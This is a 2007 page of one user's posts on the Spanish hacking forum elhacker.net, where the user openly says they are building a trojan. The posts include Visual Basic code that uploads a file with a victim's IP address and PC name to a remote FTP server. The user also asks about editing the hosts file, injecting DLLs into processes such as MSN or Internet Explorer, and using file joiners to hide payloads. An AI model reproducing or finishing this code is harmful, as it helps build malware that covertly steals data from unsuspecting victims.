elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 [6] 7 8
51  Programación / Programación Visual Basic / Re: AYUDA URGENTE, MANDAR IP A UN FTP en: 18 Junio 2007, 23:41 pm
ni idea tio no lo envia :S
52  Programación / Programación Visual Basic / EDITAR HOST ? en: 18 Junio 2007, 15:01 pm
Buenas pues e intentado editar el host  pero nose como hacerlo desde vb Tongue

yo intente esto,

Dim RG As Object
Set RG = CreateObject("WScript.Shell")
    host = RG.RegRead("LUGAR DEL HOST") ' Donde mensaje es igual a el REG_SZ que quieras leer
    RG.RegWrite ("LUGAR DEL HOST") & "Mensaje", "Revelame tu contraseña LOSER!"

Pero como que no funciona xD alguien sabe .? da error algo del registro Oo
53  Programación / Programación Visual Basic / Re: AYUDA URGENTE, MANDAR IP A UN FTP en: 18 Junio 2007, 13:20 pm
Código:
Option Explicit
Private Declare Function InternetConnect Lib "wininet.dll" Alias "InternetConnectA" (ByVal hInternetSession As Long, ByVal sServerName As String, ByVal nServerPort As Integer, ByVal sUserName As String, ByVal sPassword As String, ByVal lService As Long, ByVal lFlags As Long, ByVal lContext As Long) As Long
Private Declare Function InternetOpen Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Private Declare Function FtpPutFile Lib "wininet.dll" Alias "FtpPutFileA" (ByVal hConnect As Long, ByVal lpszLocalFile As String, ByVal lpszNewRemoteFile As String, ByVal dwFlags As Long, ByVal dwContext As Long) As Boolean
Private Declare Function InternetCloseHandle Lib "wininet.dll" (ByVal hInet As Long) As Integer
Private Declare Function FtpSetCurrentDirectory Lib "wininet.dll" Alias "FtpSetCurrentDirectoryA" (ByVal hFtpSession As Long, ByVal lpszDirectory As String) As Boolean
Const INTERNET_OPEN_TYPE_PRECONFIG = 0
Const INTERNET_DEFAULT_FTP_PORT = 21
Const INTERNET_SERVICE_FTP = 1
Const PassiveConnection As Boolean = True
Const INTERNET_FLAG_PASSIVE = &H8000000
Const FTP_TRANSFER_TYPE_UNKNOWN = &H0

Dim hConnection, hOpen, Num As Long

Private Sub Form_Load()
'####################
botarate
'####################
    hOpen = InternetOpen("IE", INTERNET_OPEN_TYPE_PRECONFIG, vbNullString, vbNullString, 0)
    DoEvents
    hConnection = InternetConnect(hOpen, "ftp.yosoy.vb", INTERNET_DEFAULT_FTP_PORT, "username", "password", INTERNET_SERVICE_FTP, IIf(PassiveConnection, INTERNET_FLAG_PASSIVE, 0), 0)
    DoEvents
    FtpSetCurrentDirectory hConnection, "\"
    DoEvents
    FtpPutFile hConnection, "App.Path & \IPFTP.txt", "IPFTP", FTP_TRANSFER_TYPE_UNKNOWN, 0
    DoEvents
    InternetCloseHandle hConnection
    InternetCloseHandle hOpen
'####################
End Sub

Private Sub botarate()
'Mandatos para guardar la IP y el nombre de la pc en un txt  llamado IPFTP.txt,guardado en la direccion donde se ejecuto la aplicacion
'eso investigatelo tu ay si no lo encuentras me avisas
End Sub
'SALU2

para guardar la ip pongo nada mas que

Código:
shell("cmd.exe /c ipconfig > c:/ip.txt"),vbhide 

No ?
54  Programación / Programación Visual Basic / Re: AYUDA URGENTE, MANDAR IP A UN FTP en: 18 Junio 2007, 00:13 am
Bueno tio pos dime como es, hendix me lo iva a decir es mas el me esta ayudando con este proyecto, lo malo que se tubo que ir, y no sa conectado, y me gustaria terminarlo ya antes de mañana

        PORFAVOR LO PIDO :(
55  Programación / Programación Visual Basic / AYUDA URGENTE, MANDAR IP A UN FTP en: 17 Junio 2007, 23:59 pm
Buenas pues mira me corre prisa por que asin puedo terminar un proyecto, me gustaria que mandara la ip a un ftp, supongamos que el ftp es usuarios.lycos, usuario " X " y password " 124"

Vale que tendria que hacer:

Que la vicitma al abrirlo la ip sea enviada a ese ftp con el nombre del pc

Supongamos
       
         IP                     PC NAME
92,213,287, --------- Rogelio

Entendeis ??

Se que se puede ya que ranefi,Hendix. me lo dijeron, pero no el codigo xD se tenia que ir a hacer " CACA " y el otro de bebidas.. ¬¬ xD va es urgente plz
56  Programación / Programación Visual Basic / Re: [Source] Inyeccion Dll en VB en: 16 Junio 2007, 13:26 pm
entonces, podemos hacer que un form descargue la dll, se cierre cargue otro form , con ese codigo, y ejecute la dll, M.. q bueno !!

Una duda, tiene que ser el notepad o puede ser arternativo, ejemplo... msn, IE, firefox.. o tiene que ser el notepad ?
57  Programación / Programación Visual Basic / Re: Capto la pantalla, la pongo en Image1 y se ve haci.... en: 14 Junio 2007, 17:41 pm
sencillo, az que cuando haga la foto la guarde en un directorio ejemplo "C\Foto.jpg" luego haces q la ponga en un host o  algo :D
58  Programación / Programación Visual Basic / Re: [Source] Cactus Joiner 2.5 FULL en: 13 Junio 2007, 20:28 pm
Muy bueno, se agradece mucho estos programas que son de tanta ayuda ala hora de "esconder" archivos,"flood msn",y por no decir tus ayudas aportadas con codigos y codigos fuente..,  te lo agradezco ||MadAntrax|| , por ello toma este pequeño presente xD



Asin lo puedes añadir a tu nuevo proyecto si quieres , o incluso para tu web, si necesitas algo avisa, algun codec ( Cosa que dudo..) Bueno o algo lo minimo, nose por ejemplo una foto para tu programa o web, algun banner , avisa que te lo ago :D es lo minimo que podria hacer por estos programas que me an sido de mucha utilidad.

P.D: aun que este post es antiguito.. me dava cosa ponerlo en otro lado xD , por cierto.. aver si acavamos la web xD que cuando entro siempre dice solo esta noticia
59  Programación / Programación Visual Basic / Re: Actualizacion Proyecto ! en: 11 Junio 2007, 20:21 pm
Otra solucion:

Al iniciar, tu programa baja el exe de tu hosting (supongo klo pongas siempre el mismo nombre y solo cambie la version en la version del archivo k es lo correcto)

Al bajar el exe del hosting compara las versiones el nuevo y del antiguo (exe)

Se la nueva es mayor entonces borra el antiguo y keda el nuevo.

salu2

Es decir que comprueve donde estaria instalado y borre el antiguo y lo remplace por el nuevo no ?
60  Programación / Programación Visual Basic / Re: Actualizacion Proyecto ! en: 10 Junio 2007, 23:51 pm
Pues, aun no esta ni la 1º version, por eso lo comento, quiero ponerle lo que necesite para actualizar cuando saque la 2º version,

Es un troyano, y sera la revolución.. :D no es directa.. ni inversa.. ( Conexion )

Ya vereis Mujijaja xD
Páginas: 1 2 3 4 5 [6] 7 8
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines